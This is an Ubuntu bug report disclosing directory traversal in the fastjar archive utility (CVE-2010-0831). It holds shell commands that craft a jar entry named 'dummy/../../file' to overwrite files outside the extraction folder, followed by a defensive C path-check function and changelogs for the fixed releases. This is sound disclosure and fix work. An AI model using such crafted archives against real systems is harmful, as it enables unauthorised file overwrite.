Directory traversal vulnerabilities

Bug #540575 reported by Dan Rosenberg
Affects             Status        Importance  Assigned to        Milestone
fastjar (Ubuntu)    Fix Released  Medium      Marc Deslauriers
  Hardy             Fix Released  Undecided   Unassigned
  Jaunty            Fix Released  Undecided   Unassigned
  Karmic            Fix Released  Undecided   Unassigned
  Lucid             Fix Released  Undecided   Unassigned

Bug Description

Binary package hint: fastjar

The "fastjar" archive utility, installed on my Linux system as "/usr/bin/fastjar", is
vulnerable to directory traversal vulnerabilities. If an attacker can convince
a victim to extract a malicious .jar file, arbitrary files on disk may be
overwritten without prompting.

fastjar attempts to prevent directory traversal, presumably by checking if the
first several characters of a file included in the .jar archive are "../". For
example (my /usr/bin/jar is a symlink to fastjar):

=============================================

drosenbe@Dan:~/jar$ touch ../file
drosenbe@Dan:~/jar$ jar cvf evil.jar ../file
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/MANIFEST.MF (in=56) (out=56) (stored 0%)
adding: ../file (in=129) (out=93) (deflated 27%)
Total:
------
(in = 169) (out = 455) (deflated -169%)
drosenbe@Dan:~/jar$ jar -xvf evil.jar
   created: META-INF/
 extracted: META-INF/MANIFEST.MF
Traversal to parent directories during unpacking!

=============================================

However, this can be subverted by creating a dummy folder and traversing from
there, as follows:

=============================================

drosenbe@Dan:~/jar$ echo "This is an evil file" > ../file
drosenbe@Dan:~/jar$ mkdir dummy
drosenbe@Dan:~/jar$ jar cvf evil.jar dummy/../../file
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/MANIFEST.MF (in=56) (out=56) (stored 0%)
adding: dummy/../../file (in=21) (out=21) (deflated 0%)
Total:
------
(in = 61) (out = 401) (deflated -557%)
drosenbe@Dan:~/jar$ echo "This is a good file" > ../file
drosenbe@Dan:~/jar$ cat ../file
This is a good file
drosenbe@Dan:~/jar$ jar xvf evil.jar
 extracted: META-INF/MANIFEST.MF
  inflated: dummy/../../file
drosenbe@Dan:~/jar$ cat ../file
This is an evil file

=============================================

fastjar also allows the inclusion of full paths as file names, which will be
extracted and overwrite files without prompting. Archive programs such as jar
should take care to ensure that extracted contents remain in the current
directory and do not allow absolute paths or directory traversal, both of which
pose security vulnerabilities.

Please let me know if you have any trouble reproducing this issue or any
questions. I have confirmed that Sun's release of the "jar" utility is also vulnerable
to these issues, and I have contacted their security team.
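A defender-side entry-name check of the kind the report asks for, written as an added example (it is not fastjar's code and not the patch attached to this bug): an entry is rejected if its name is absolute or if walking its components ever climbs above the extraction directory, which catches `../file`, `dummy/../../file` and full paths alike, while still allowing `dummy/../file`, which stays inside. The function name `entry_escapes` and the sample entry list are this example's own; an archive tool may also adopt the simpler, stricter policy of refusing any `..` component at all.

```c
#include <stdio.h>
#include <string.h>

/* Returns 1 if the archive entry name is unsafe to extract relative to the
 * current directory: it is empty, absolute, or normalising its "." and ".."
 * components climbs above the extraction root at any point.
 * Returns 0 if the entry stays inside the extraction directory.
 * Both '/' and '\\' are treated as separators to be conservative. */
int entry_escapes(const char *name)
{
    const char *p = name;
    int depth = 0;   /* how many directory levels below the root we are */

    if (name == NULL || *name == '\0')
        return 1;                        /* nothing sensible to extract */
    if (name[0] == '/' || name[0] == '\\')
        return 1;                        /* absolute path: always reject */

    while (*p != '\0') {
        const char *end = p;
        size_t len;
        while (*end != '\0' && *end != '/' && *end != '\\')
            end++;
        len = (size_t)(end - p);
        if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (--depth < 0)
                return 1;                /* climbed above the root */
        } else if (len > 0 && !(len == 1 && p[0] == '.')) {
            depth++;                     /* ordinary component, one level deeper */
        }
        /* empty component ("a//b") and "." leave the depth unchanged */
        p = (*end == '\0') ? end : end + 1;
    }
    return 0;
}

int main(void)
{
    /* Entry names from the report above plus constructed ones for contrast. */
    const char *entries[] = {
        "META-INF/MANIFEST.MF", "../file", "dummy/../../file",
        "/absolute/path", "dummy/../file", "a/b/../../../c"
    };
    size_t i;
    for (i = 0; i < sizeof entries / sizeof entries[0]; i++)
        printf("%-24s %s\n", entries[i],
               entry_escapes(entries[i]) ? "REJECT (escapes extraction dir)"
                                         : "ok");
    return 0;
}
```

The check is applied to the entry name as stored in the archive, before any file is opened or created, so a rejected entry never touches the disk; prefix matching on "../" alone, as the report shows, is not enough because the climb can start after a harmless leading component.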

Tags: patch
Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

Incomplete fix for CVE-2006-3619?

Dan Rosenberg (dan-j-rosenberg) wrote :

This does appear to be an incomplete fix for the above issue, but the unpacking of absolute paths seems to be new (and also dangerous).

Kees Cook (kees)
Changed in fastjar (Ubuntu):
status: New → Confirmed
importance: Undecided → Medium
Dan Rosenberg (dan-j-rosenberg) wrote :

I've attached a fix for both issues. I've tested the fix thoroughly, confirmed it does not break functionality, and made sure it resolves the vulnerability, even when doing all sorts of tricks with "." and ".." entries in the path of a file added to a .jar archive.

Kees Cook (kees) wrote :

CVE-2010-0831, current CRD is 2010-05-25

Kees Cook (kees)
visibility: private → public
tags: added: patch
Changed in fastjar (Ubuntu):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in fastjar (Ubuntu Hardy):
status: New → Confirmed
Changed in fastjar (Ubuntu Lucid):
status: New → Confirmed
Changed in fastjar (Ubuntu Jaunty):
status: New → Confirmed
Changed in fastjar (Ubuntu Karmic):
status: New → Confirmed
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package fastjar - 2:0.98-1ubuntu0.10.04.1

---------------
fastjar (2:0.98-1ubuntu0.10.04.1) lucid-security; urgency=low

  * SECURITY UPDATE: directory traversal vulnerabilities (LP: #540575)
    - jartool.c (extract_jar): Fix up checks for traversal to parent
      directories, disallow absolute paths, make the code slightly more
      efficient. (patch from trunk)
    - CVE-2010-0831
  * Additional patches from the trunk:
    - jartool.c (read_entries): Properly zero-terminate filename.
    - jartool.c (add_file_to_jar): Fix write return value check.
 -- Marc Deslauriers <email address hidden> Fri, 18 Jun 2010 08:20:03 -0400

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package fastjar - 2:0.98-1ubuntu0.9.10.1

---------------
fastjar (2:0.98-1ubuntu0.9.10.1) karmic-security; urgency=low

  * SECURITY UPDATE: directory traversal vulnerabilities (LP: #540575)
    - jartool.c (extract_jar): Fix up checks for traversal to parent
      directories, disallow absolute paths, make the code slightly more
      efficient. (patch from trunk)
    - CVE-2010-0831
  * Additional patches from the trunk:
    - jartool.c (read_entries): Properly zero-terminate filename.
    - jartool.c (add_file_to_jar): Fix write return value check.
 -- Marc Deslauriers <email address hidden> Fri, 18 Jun 2010 08:23:57 -0400

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package fastjar - 2:0.97-3ubuntu0.1

---------------
fastjar (2:0.97-3ubuntu0.1) jaunty-security; urgency=low

  * SECURITY UPDATE: directory traversal vulnerabilities (LP: #540575)
    - jartool.c (extract_jar): Fix up checks for traversal to parent
      directories, disallow absolute paths, make the code slightly more
      efficient. (patch from trunk)
    - CVE-2010-0831
  * Additional patches from the trunk:
    - jartool.c (read_entries): Properly zero-terminate filename.
    - jartool.c (add_file_to_jar): Fix write return value check.
 -- Marc Deslauriers <email address hidden> Fri, 18 Jun 2010 08:35:33 -0400

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package fastjar - 2:0.95-1ubuntu2.1

---------------
fastjar (2:0.95-1ubuntu2.1) hardy-security; urgency=low

  * SECURITY UPDATE: directory traversal vulnerabilities (LP: #540575)
    - jartool.c (extract_jar): Fix up checks for traversal to parent
      directories, disallow absolute paths, make the code slightly more
      efficient. (patch from trunk)
    - CVE-2010-0831
  * Additional patches from the trunk:
    - jartool.c (read_entries): Properly zero-terminate filename.
 -- Marc Deslauriers <email address hidden> Fri, 18 Jun 2010 08:37:54 -0400

Changed in fastjar (Ubuntu Hardy):
status: Confirmed → Fix Released
Changed in fastjar (Ubuntu Jaunty):
status: Confirmed → Fix Released
Changed in fastjar (Ubuntu Karmic):
status: Confirmed → Fix Released
Changed in fastjar (Ubuntu Lucid):
status: Confirmed → Fix Released
Changed in fastjar (Ubuntu):
status: Confirmed → Fix Released